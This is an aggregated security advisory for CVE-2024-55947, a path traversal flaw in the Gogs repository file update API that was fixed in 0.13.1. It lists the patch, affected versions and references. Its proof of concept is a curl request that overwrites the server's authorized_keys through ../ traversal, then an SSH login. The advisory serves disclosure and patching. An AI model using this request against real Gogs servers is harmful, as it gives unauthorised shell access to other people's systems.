Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1xZjV2LXJwNDctNTVnZ84ABCrN
Path Traversal in file update API in gogs
Impact
The malicious user is able to write a file to an arbitrary path on the server to gain SSH access to the server.
Patches
Writing files outside repository Git directory has been prohibited via the repository file update API (https://github.com/gogs/gogs/pull/7859). Users should upgrade to 0.13.1 or the latest 0.14.0+dev.
Workarounds
No viable workaround available, please only grant access to trusted users to your Gogs instance on affected versions.
References
n/a
Proof of Concept
-
Generate a Personal Access Tokens
-
Edit any file on the server with this
curl -v --path-as-is -X PUT --url "http://localhost:10880/api/v1/repos/Test/bbcc/contents/../../../../../../../../home/git/.ssh/authorized_keys" \ -H "Authorization: token eaac23cf58fc76bbaecd686ec52cd44d903db9bf" \ -H "Content-Type: application/json" \ --data '{ "message": "an", "content": "<base64encoded: your ssh pub key>" }' -
ssh connect to remote server
ssh -i temp git@localhost -p 10022
For more information
If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7582.
Permalink: https://github.com/advisories/GHSA-qf5v-rp47-55ggJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1xZjV2LXJwNDctNTVnZ84ABCrN
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 16 days ago
Updated: 16 days ago
EPSS Percentage: 0.00045
EPSS Percentile: 0.17541
Identifiers: GHSA-qf5v-rp47-55gg, CVE-2024-55947
References:
- https://github.com/gogs/gogs/security/advisories/GHSA-qf5v-rp47-55gg
- https://nvd.nist.gov/vuln/detail/CVE-2024-55947
- https://github.com/gogs/gogs/issues/7582
- https://github.com/gogs/gogs/pull/7859
- https://github.com/gogs/gogs/commit/9a9388ace25bd646f5098cb9193d983332c34e41
- https://github.com/advisories/GHSA-qf5v-rp47-55gg
Blast Radius: 0.0
Affected Packages
go:gogs.io/gogs
Dependent packages: 2Dependent repositories: 1
Downloads:
Affected Version Ranges: < 0.13.1
Fixed in: 0.13.1
All affected versions: 0.2.0, 0.3.0, 0.3.1, 0.4.0, 0.4.1, 0.4.2, 0.5.0, 0.5.2, 0.5.5, 0.5.8, 0.5.9, 0.5.11, 0.5.13, 0.6.0, 0.6.1, 0.6.3, 0.6.5, 0.6.9, 0.6.15, 0.7.0, 0.7.6, 0.7.19, 0.7.22, 0.7.33, 0.8.0, 0.8.10, 0.8.25, 0.8.43, 0.9.0, 0.9.13, 0.9.46, 0.9.48, 0.9.60, 0.9.71, 0.9.97, 0.9.113, 0.9.128, 0.9.141, 0.10.1, 0.10.8, 0.10.18, 0.11.4, 0.11.19, 0.11.29, 0.11.33, 0.11.34, 0.11.43, 0.11.53, 0.11.66, 0.11.79, 0.11.86, 0.11.91, 0.12.0, 0.12.1, 0.12.2, 0.12.3, 0.12.4, 0.12.5, 0.12.6, 0.12.7, 0.12.8, 0.12.9, 0.12.10, 0.12.11, 0.13.0
All unaffected versions: